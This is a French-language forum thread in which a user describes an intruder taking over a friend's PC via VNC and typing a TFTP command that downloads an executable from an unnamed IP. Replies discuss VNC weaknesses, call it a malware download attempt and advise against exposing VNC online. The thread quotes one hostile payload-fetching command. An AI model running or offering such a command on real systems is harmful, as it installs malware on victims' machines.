Hacké via TFTP... plus d'infos - Windows & Software
Marsh Posté le 24-09-2006 à 18:26:31
google est la 1ere chose que j'ai faite, quelqu'un saurait m'en dire plus ?
Marsh Posté le 24-09-2006 à 18:29:57
Y'avait un mdp pour la connexion VNC ?
Quelle version de VNC ? Certaines ont des failles.
Sinon il a essayé de récupérer un logiciel malveillant (virus, trojan, ...)
Quelle était l'IP ?
Marsh Posté le 24-09-2006 à 22:01:13
ShonGail a écrit : Y'avait un mdp pour la connexion VNC ? |
oui il y avait un mot de passe, la dernière version donc pas de pb de failles (pas la 4.0.1)
son IP venais de londre, jai fait un trace rout mais il a très bien pu passer par un proxy.
Marsh Posté le 24-09-2006 à 22:26:54
Ce n'est pas parce que c'est la dernière version qu'une faille n'est pas présente, ni peut-être exploitée.
Si le mdp était costaud, c'est même la seule explication si VNC a bien été la porte d'entrée du hack.
Solution : ne pas utiliser VNC.
Perso je ne l'utilise qu'en local. Jamais ouvert sur le net.
Marsh Posté le 24-09-2006 à 22:39:49
puis de toute facon le pass a été changé, celui ci m'as été communiqué par téléphone, puis quelques secondes après m'etre re-connecter sur le pc de mon pote via vnc la meme chose s'est reproduite avec une ip différente, me direz vous j'aurais du empecher ceci mais j'ai laisser faire la chose volontairement par curiosité de la commande que la personne allait taper, mais je pense que c'était un bot...
Marsh Posté le 24-09-2006 à 15:48:51
Bonjour, voila j'expose ma péripéthie.
J'étais sur le pc d'un pote via vnc, et quelqu'un d'autre que moi a pris le controle de son pc (norton a affiché une detection d'intrusion, il avait donc a ce moment la 2 pc connecté au sien, le mien + celui de l'espion), le mec a ensuite ouvert cmd puis a tapé tftp -i UNE_IP GET msinexecs.exe, puis plus rien... quelqu'un pourrais t'il m'expliquer ce que l'espion a esseyé de faire ?
Merci